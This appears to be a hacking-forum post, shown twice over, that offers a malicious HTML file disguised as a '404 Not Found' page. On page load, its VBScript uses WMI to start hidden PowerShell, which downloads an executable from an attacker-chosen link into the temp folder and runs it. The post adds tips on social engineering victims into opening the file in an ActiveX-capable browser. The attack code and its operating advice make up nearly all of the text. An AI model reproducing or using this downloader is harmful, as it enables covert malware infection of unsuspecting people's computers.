What is Html Local Code Execution?
If the person runs the specific html file through the browser, the exe file in the link we target is downloaded and run. The optional command can be changed and added to other things, it's up to your creativity.
code:
<html>
<head>
<title> >_ </title>
<center><h1>404 Not Found</h1></center>
<script language="VBScript">
Sub window_onload
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set objStartup = Service.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set Process = Service.Get("Win32_Process")
Error = Process.Create("cmd.exe /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('file is direct download link','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'", null, objConfig, intProcessID)
window.close()
end sub
</script>
</head>
</html>
Not working in every browser, working in browsers that support ACTIVEX (for example avant browser), if your social engineering is good, by editing the page content convincingly, when the other person opens it in chrome (or another browser), this file cannot be opened outside Avant Browser as text, click to download, etc. You can trick it with etc.
If the person runs the specific html file through the browser, the exe file in the link we target is downloaded and run. The optional command can be changed and added to other things, it's up to your creativity.
code:
<html>
<head>
<title> >_ </title>
<center><h1>404 Not Found</h1></center>
<script language="VBScript">
Sub window_onload
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set objStartup = Service.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set Process = Service.Get("Win32_Process")
Error = Process.Create("cmd.exe /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('file is direct download link','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'", null, objConfig, intProcessID)
window.close()
end sub
</script>
</head>
</html>
Not working in every browser, working in browsers that support ACTIVEX (for example avant browser), if your social engineering is good, by editing the page content convincingly, when the other person opens it in chrome (or another browser), this file cannot be opened outside Avant Browser as text, click to download, etc. You can trick it with etc.
